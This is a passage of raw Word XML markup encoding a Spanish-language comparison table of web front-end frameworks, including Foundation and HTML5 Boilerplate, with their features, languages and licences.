              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Plugins JavaScript (tooltips, popover, transiciones, dropdown, etc)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2497" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>CSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1772" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>APACHE LICENCE</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidTr="00DE74BD">
        <w:trPr>
          <w:trHeight w:val="323"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="4957" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Foundation</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6845FEFF" wp14:editId="60545A85">
                  <wp:extent cx="1156447" cy="1522657"/>
                  <wp:effectExtent l="0" t="0" r="5715" b="1905"/>
                  <wp:docPr id="53" name="Imagen 53" descr="Resultado de imagen para foundation framework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foundation framework logo"/>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169118" cy="1539340"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4488" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:ind w:firstLine="709"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>La competencia de </w:t>
            </w:r>
            <w:hyperlink r:id="rId48" w:history="1">
              <w:r w:rsidRPr="00DE74BD">
                <w:rPr>
                  <w:rFonts w:eastAsia="Calibri"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>Bootstrap</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t> se llama </w:t>
            </w:r>
            <w:hyperlink r:id="rId49" w:history="1">
              <w:r w:rsidRPr="00DE74BD">
                <w:rPr>
                  <w:rFonts w:eastAsia="Calibri"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>Foundation</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> y es un framework orientado al </w:t>
            </w:r>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>desarrollo de sitios web </w:t>
            </w:r>
            <w:hyperlink r:id="rId50" w:history="1">
              <w:r w:rsidRPr="00DE74BD">
                <w:rPr>
                  <w:rFonts w:eastAsia="Calibri"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>responsivos</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t> bajo el enfoque </w:t>
            </w:r>
            <w:hyperlink r:id="rId51" w:history="1">
              <w:r w:rsidRPr="00DE74BD">
                <w:rPr>
                  <w:rFonts w:eastAsia="Calibri"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>mobile first</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3873" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Tiene una amplia comunidad y soporte.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Flexible sistema de 12 columnas grid.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Gran cantidad de estilos.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Elementos HTML: botones, formularios, sliders etc.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Soporte entre dispositivos, resoluciones etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2497" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>SASS/SCSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1772" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>MIT</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidTr="00DE74BD">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4957" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00E50E76" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>HTML</w:t>
            </w:r>
            <w:r w:rsidR="00DE74BD" w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> 5 Boilerplate</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F219103" wp14:editId="65C4DAC2">
                  <wp:extent cx="1809345" cy="1809345"/>
                  <wp:effectExtent l="0" t="0" r="635" b="635"/>
                  <wp:docPr id="54" name="Imagen 54" descr="Resultado de imagen para Html5 Boilerplate framework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Html5 Boilerplate framework logo"/>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16619" cy="1816619"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4488" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00E50E76">
            <w:pPr>
              <w:ind w:firstLine="709"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>HTML5 Boilerplate nos ofrece simplificar el proceso de construcción de sitios web en HTML5 y para ello nos permite descargar una especie de template o plantilla que puede ayudar no solo a l</w:t>
            </w:r>
            <w:r w:rsidR="00E50E76">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>os desarrolladores web novatos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3873" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="37"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Template adaptado a dispositivos móviles y otras resoluciones.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="37"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Amplia documentación con trucos y consejos.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="37"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Librerías jQuery y Moderniz</w:t>
            </w:r>
            <w:r w:rsidR="00E50E76">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>e</w:t>
            </w:r>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>r.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="37"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Iconos, estilos, helpers etc.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="37"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Un snippet optimizado para Google Analytics.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2497" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1772" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>OPEN SOURCE</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidTr="00DE74BD">
        <w:trPr>
          <w:trHeight w:val="323"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="4957" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
